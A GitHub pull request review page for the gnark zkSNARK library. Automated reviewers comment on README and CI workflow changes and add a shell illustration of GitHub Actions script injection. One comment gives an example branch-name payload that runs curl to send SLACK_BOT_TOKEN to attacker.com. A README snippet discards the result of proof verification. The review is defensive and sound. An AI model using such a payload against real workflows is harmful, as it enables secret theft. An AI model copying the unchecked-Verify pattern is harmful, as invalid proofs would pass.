Pull request overview
This PR refreshes README.md to present a more streamlined project introduction and onboarding flow for gnark users and contributors.
Changes:
- Reworks the README intro into a shorter “Why gnark” + “Useful Links” format.
- Adds a “Quick Start” section with requirements, install, and example run instructions.
- Reorganizes/updates sections on proving systems, GPU acceleration, security, testing commands, audits, and release notes.
| ### Requirements | ||
|
|
||
| `gnark` tries to be backwards compatible when possible, however we do not guarantee that serialized object formats are static over different versions of `gnark`. Particularly - we do not have versioning implemented in the serialized formats, so using files between different versions of gnark may lead to undefined behaviour or even crash the program. | ||
| - Go `1.25+` (module target: `go 1.25.6`) |
The stated requirement "Go 1.25+" is looser than the module’s go 1.25.6 directive. To avoid users trying unsupported patch versions, consider documenting the minimum as Go 1.25.6+ (or explicitly explain that the module targets 1.25.6 and CI uses 1.25.x).
| - Go `1.25+` (module target: `go 1.25.6`) | |
| - Go `1.25.6+` (module target: `go 1.25.6`) |
|
|
||
| If you have any questions, queries or comments, [GitHub discussions] is the place to find us. | ||
| ```bash | ||
| go run ./examples/cubic |
The Quick Start example command uses a repo-relative path (go run ./examples/cubic), which will fail for readers who haven’t cloned the repository. Consider either adding a preceding clone/cd step or using a module-path invocation (e.g., go run github.com/consensys/gnark/examples/cubic@latest) so the Quick Start works from anywhere.
| go run ./examples/cubic | |
| go run github.com/consensys/gnark/examples/cubic@latest |
| ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit) | ||
|
|
||
| // groth16 zkSNARK: Setup | ||
| pk, vk, _ := groth16.Setup(ccs) | ||
|
|
||
| // witness definition | ||
| assignment := CubicCircuit{X: 3, Y: 35} | ||
| witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField()) | ||
| publicWitness, _ := witness.Public() | ||
|
|
||
| // groth16: Prove & Verify | ||
| proof, _ := groth16.Prove(ccs, pk, witness) | ||
| groth16.Verify(proof, vk, publicWitness) | ||
| _ = groth16.Verify(proof, vk, publicWitness) |
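Review bot: The last line, `_ = groth16.Verify(proof, vk, publicWitness)`, throws away the only value Verify returns, so anyone copying this snippet gets code that carries on as if the proof were valid whether or not verification succeeded. Suggest `if err := groth16.Verify(proof, vk, publicWitness); err != nil { panic(err) }`, and the same treatment for the `_` results of Compile, Setup, NewWitness, Public and Prove above it.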
The example circuit ignores errors from Compile, Setup, NewWitness, Prove, and Verify (and explicitly discards the Verify result). Since this snippet is likely to be copy/pasted, it would be better to demonstrate basic error handling (even `if err != nil { panic(err) }`) so failures don’t get silently ignored.
| Common local commands: | ||
|
|
||
| ```bash | ||
| go test -short ./... |
go test -tags=release_checks,solccheck . requires additional local tooling (e.g., gnark-solidity-checker, solc, abigen) to be installed, otherwise it will fail. Consider adding a short note next to this command (or splitting it into a separate “requires extra deps” block) so contributors know what’s needed.
| go test -short ./... | |
| go test -short ./... | |
| # requires gnark-solidity-checker, solc, and abigen to be installed locally |
|
| go test -json -v -p 4 -timeout=30m -tags=prover_checks ./test/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -json -v -p 4 -timeout=30m -tags=prover_checks ./examples/... 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -json -v -run=NONE -fuzz=FuzzIntcomp -fuzztime=30s ./internal/backend/ioutils 2>&1 | gotestfmt -hide=all | tee -a /tmp/gotest.log | ||
| go test -short -json -v -p 4 -short -timeout=30m ./... 2>&1 | gotestfmt -hide=all | tee /tmp/gotest.log |
Duplicate -short flag in test command
Low Severity
The go test command on this line passes -short twice: once at the beginning and once after -p 4. The original command already had -short before -timeout=30m, and the bulk addition of -short to the start of each test line created this duplication. While Go silently accepts duplicate flags, this is clearly unintentional and suggests a missed cleanup.
| - name: Post to Slack | ||
| run: | | ||
| if [ "${{ inputs.status }}" == "success" ]; then | ||
| payload=$(jq -n --arg repository "${{ inputs.repository }}" --arg branch "${{ inputs.branch }}" --arg actor "${{ inputs.actor }}" --arg run_id "${{ inputs.run_id }}" '{ |
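Review bot: `inputs.branch` is not the only expression expanded into this script: the `jq` line also pastes `inputs.repository`, `inputs.actor` and `inputs.run_id` into the command text, and the `if` line above it does the same with `inputs.status`. Pass all five through the step's `env:` mapping and reference them as quoted shell variables (for example `--arg branch "$BRANCH"`), so that none of them is parsed as shell source.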
Script injection via branch name in Slack workflow
Medium Severity
${{ inputs.branch }} is directly interpolated into a shell run: block. In the PR workflow, this value comes from ${{ github.head_ref }}, which is a user-controlled branch name. An attacker can craft a branch name containing shell metacharacters (e.g., "; curl attacker.com?t=$SLACK_BOT_TOKEN; #) to achieve arbitrary command execution and potentially exfiltrate SLACK_BOT_TOKEN. The safe pattern is to assign untrusted inputs to environment variables first, then reference them as "$BRANCH" in the script.
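
The difference between the two patterns named in the comment above, as an added example that is not part of the PR or the gnark repository: it models `${{ ... }}` expansion by pasting a value into script text, compares that with passing the same value through the environment, and adds a heuristic check for expressions inside `run: |` blocks. The function names, the branch value and the workflow fragment are constructed for illustration, and `printf` stands in for the workflow's `jq` call.

```sh
# Added illustration. GitHub Actions substitutes ${{ ... }} into the script
# text before the shell parses it; run_interpolated models that step.

# Constructed branch name; the injected command is a harmless echo.
BRANCH_VALUE='feat"; echo INJECTED-COMMAND-RAN; #'

# Unsafe pattern: the value becomes part of the script source, as
# "${{ inputs.branch }}" does inside a run: block.
run_interpolated() {
  sh -c 'printf "branch=%s\n" "'"$1"'"' 2>&1
}

# Safe pattern: the script text is constant and the value arrives through
# the environment (env: BRANCH: ${{ inputs.branch }} in the workflow).
run_env() {
  BRANCH="$1" sh -c 'printf "branch=%s\n" "$BRANCH"' 2>&1
}

# Heuristic check: print lines inside a "run: |" block that contain ${{ .
# Reads a workflow on stdin; returns 1 when something is flagged.
lint_run_blocks() {
  awk '
    { indent = match($0, /[^ ]/) - 1 }
    in_run && NF && indent <= run_indent { in_run = 0 }
    in_run && index($0, "${{") { print NR ": " $0; found = 1 }
    /^ *(- )?run: *[|>]/ { in_run = 1; run_indent = indent }
    END { exit found + 0 }
  '
}

# Constructed workflow fragment: the first step has the flagged shape,
# the second passes the same input through env: instead.
SAMPLE_WORKFLOW='steps:
  - name: unsafe
    run: |
      echo "branch ${{ inputs.branch }}"
  - name: safe
    env:
      BRANCH: ${{ inputs.branch }}
    run: |
      echo "branch $BRANCH"'

run_interpolated "$BRANCH_VALUE"   # second output line comes from the injected echo
run_env "$BRANCH_VALUE"            # one line; the whole value is printed as data
printf '%s\n' "$SAMPLE_WORKFLOW" | lint_run_blocks || true
```

The check is indentation-based and only covers block-style `run: |` steps; a single-line `run:` with an expression on the same line is not reported.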


Description
Fixes # (issue)
Type of change
How has this been tested?
How has this been benchmarked?
Checklist:
- `golangci-lint` does not output errors locally

Note
Medium Risk
Main risk is CI behavior change: more tests are gated behind `-short` and some fuzzing/time-consuming cases are reduced or skipped, which could let regressions slip through; Slack notifications add a new external integration dependent on secrets and `curl`/`jq` availability.

Overview
CI workflows now use `go tool goimports` (dropping explicit `goimports` installs) and add a new reusable workflow, `slack-notifications.yml`, to post success/failure messages to Slack after `pr` and `push` test jobs.

Test/runtime changes: PR CI runs all test commands in `-short` mode, reduces fuzz time, and several heavy tests/integration paths now skip or downsample work when `testing.Short()` is enabled.

Deps/docs: bumps `gnark-crypto` and updates `go.mod` to track `goimports`/`asmfmt` via the Go `tool` directive; `README.md` is substantially reorganized with new quick start/testing sections and updated messaging.

Written by Cursor Bugbot for commit b450755. This will update automatically on new commits.